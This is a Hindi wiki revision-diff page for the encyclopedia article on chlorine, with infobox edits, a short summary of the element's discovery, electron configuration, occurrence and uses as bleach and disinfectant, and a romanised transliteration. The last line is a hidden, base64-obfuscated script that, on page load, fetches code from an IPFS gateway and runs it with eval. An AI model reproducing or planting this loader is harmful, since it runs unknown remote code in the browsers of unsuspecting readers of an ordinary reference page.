Difference between revisions of "क्लोरीन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(8 intermediate revisions by 4 users not shown)
Line 5: Line 5:
 
|symbol=Cl
 
|symbol=Cl
 
|left=[[गन्धक]]
 
|left=[[गन्धक]]
|right=[[ऑर्गन]]
+
|right=[[आर्गन]]
 
|above=[[फ़्लोरीन|F]]
 
|above=[[फ़्लोरीन|F]]
 
|below=[[ब्रोमिन|Br]]
 
|below=[[ब्रोमिन|Br]]
|series=हैलोजन
+
|series=[[हैलोजन]]
 
|series plain=
 
|series plain=
 
|series comment=
 
|series comment=
Line 28: Line 28:
 
|atomic mass 2=
 
|atomic mass 2=
 
|atomic mass comment=
 
|atomic mass comment=
|electron configuration=&#91;[[Neon|Ne]]&#93; 3s<sup>2</sup> 3p<sup>5</sup>
+
|electron configuration=1s<sup>2</sup>, 2s<sup>2</sup> 2p<sup>6</sup>, 3s<sup>2</sup> 3p<sup>5</sup>
 
|electrons per shell=2, 8, 7
 
|electrons per shell=2, 8, 7
 
|color=
 
|color=
Line 75: Line 75:
 
|crystal structure comment=
 
|crystal structure comment=
 
|oxidation states='''7''', 6, '''5''', 4, '''3''', 2, '''1''', '''-1'''
 
|oxidation states='''7''', 6, '''5''', 4, '''3''', 2, '''1''', '''-1'''
|oxidation states comment=शक्तिशाली [[अम्ल|अम्लीय]] ऑक्साइड
+
|oxidation states comment=शक्तिशाली [[अम्ल|अम्लीय]] [[ऑक्साइड]]
 
|electronegativity=3.16
 
|electronegativity=3.16
 
|number of ionization energies=4
 
|number of ionization energies=4
Line 85: Line 85:
 
|covalent radius=102±4
 
|covalent radius=102±4
 
|Van der Waals radius=175
 
|Van der Waals radius=175
|magnetic ordering=[[प्रतिचुम्बकीय पदार्थ|द्विचुम्बकीय]]<ref>[http://www-d0.fnal.gov/hardware/cal/lvps_info/engineering/elementmagn.pdf Magnetic susceptibility of the elements and inorganic compounds], in Handbook of Chemistry and Physics 81st edition, CRC press. </ref>
+
|magnetic ordering=[[प्रतिचुम्बकीय पदार्थ|द्विचुम्बकीय]]
 
|electrical resistivity=
 
|electrical resistivity=
 
|electrical resistivity at 0=
 
|electrical resistivity at 0=
Line 108: Line 108:
 
|isotopes=
 
|isotopes=
 
{{Elementbox_isotopes_stable | mn=35 | sym=Cl | na=75.77% | n=18 }}
 
{{Elementbox_isotopes_stable | mn=35 | sym=Cl | na=75.77% | n=18 }}
{{Elementbox_isotopes_decay2 | mn=36 | sym=Cl | na=ट्रेस | hl=3.01×10<sup>5</sup> [[वर्ष|y]] | dm1=β<sup>−</sup> | de1=0.709 | pn1=36 | ps1=[[आर्गन|Ar]] | dm2=ε | de2=- | pn2=36 | ps2=[[गंधक|S]] }}
+
{{Elementbox_isotopes_decay2 | mn=36 | sym=Cl | na=ट्रेस | hl=3.01×10<sup>5</sup> y | dm1=β<sup>−</sup> | de1=0.709 | pn1=36 | ps1=[[आर्गन|Ar]] | dm2=ε | de2=- | pn2=36 | ps2=[[गंधक|S]] }}
 
{{Elementbox_isotopes_stable | mn=37 | sym=Cl | na=24.23% | n=20 }}
 
{{Elementbox_isotopes_stable | mn=37 | sym=Cl | na=24.23% | n=20 }}
 
|isotopes comment=
 
|isotopes comment=
 
}}
 
}}
 +
'''क्लोरीन''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Chlorine) [[गैस]] की खोज सर्वप्रथम शीले ने की थी। क्लोरीन का प्रतीक 'Cl' तथा [[परमाणु संख्या]] 17 है। क्लोरीन का [[इलेक्ट्रॉनिक विन्यास]] 1s<sup>2</sup> 2s<sup>2</sup> 2p<sup>6</sup> 3s<sup>2</sup> 3p<sup>5</sup> होता है। क्लोरीन एक अत्यंत क्रियाशील गैस है। संयुक्त अवस्था में यह साधारण नमक (सोडियम क्लोराइड) में पायी जाती है। यह स्वतंत्र अवस्था में [[ज्वालामुखी]] [[पर्वत|पर्वतों]] से निकली गैसों में उपस्थित रहती है। इस गैस के औद्योगिक निर्माण के लिये वेल्डन, डीकन आदि प्रक्रियाओं का प्रयोग किया जाता है। शुष्क व बुझे चूने में क्लोरिन गैस प्रवाहित करने पर [[कैल्सियम हाइपोक्लोराइट|विरंजक चूर्ण]] का निर्माण होता है। यह एक तीव्र विरंजक गैस है व [[रंग|रंगीन]] कपड़ों, [[फूल|फूलों]] आदि का रंग उड़ा देती है। यह गैस कीटाणु नाशक के रूप में, ऑक्सीकारक के रूप में प्रयोग की जाती है।
  
*([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Chlorine) क्लोरीन [[गैस]] की खोज सर्वप्रथम शीले ने की थी।
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक=|पूर्णता=|शोध=}}
*यह एक अत्यंत क्रियाशील गैस है।
 
*संयुक्त अवस्था में यह साधारण नमक (सोडियम क्लोराइड) में पायी जाती है। व स्वतंत्र अवस्था में ज्वालामुखी पर्वतों से निकली गैसों में उपस्थित रहती है।
 
*इस गैस के औद्योगिक निर्माण के लिये वेल्डन, डीकन आदि प्रक्रियाओं का प्रयोग किया जाता है।
 
*शुष्क व बुझे चूने में क्लोरिन गैस प्रवाहित करने पर विरंजक चूर्ण का निर्माण होता है।
 
*यह एक तीव्र विरंजक गैस है व [[रंग|रंगीन]] कपड़ों, [[फूल|फूलों]] आदि का रंग उड़ा देती है।
 
*यह गैस कीटाणु नाशक के रूप में, ऑक्सीकारक के रूप में प्रयोग की जाती है।
 
 
 
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{आवर्त सारणी}}
+
{{आवर्त सारणी}}{{रसायन विज्ञान}}
 
[[Category:रसायन विज्ञान]]
 
[[Category:रसायन विज्ञान]]
 +
[[Category:रासायनिक तत्त्व]]
 +
[[Category:अधातु]]
 +
[[Category:गैसें]]
 +
[[Category:हैलोजन]]
 
[[Category:विज्ञान_कोश]]
 
[[Category:विज्ञान_कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:17, 17 February 2021

  1. REDIRECTsaancha:Infobox element

klorin (aangrezi:Chlorine) gais ki khoj sarvapratham shile ne ki thi. klorin ka pratik 'Cl' tatha paramanu sankhya 17 hai. klorin ka ilektr aaunik vinyas 1s2 2s2 2p6 3s2 3p5 hota hai. klorin ek atyant kriyashil gais hai. sanyukt avastha mean yah sadharan namak (sodiyam kloraid) mean payi jati hai. yah svatantr avastha mean jvalamukhi parvatoan se nikali gaisoan mean upasthit rahati hai. is gais ke audyogik nirman ke liye veldan, dikan adi prakriyaoan ka prayog kiya jata hai. shushk v bujhe choone mean klorin gais pravahit karane par viranjak choorn ka nirman hota hai. yah ek tivr viranjak gais hai v rangin kap doan, phooloan adi ka rang u da deti hai. yah gais kitanu nashak ke roop mean, aauksikarak ke roop mean prayog ki jati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>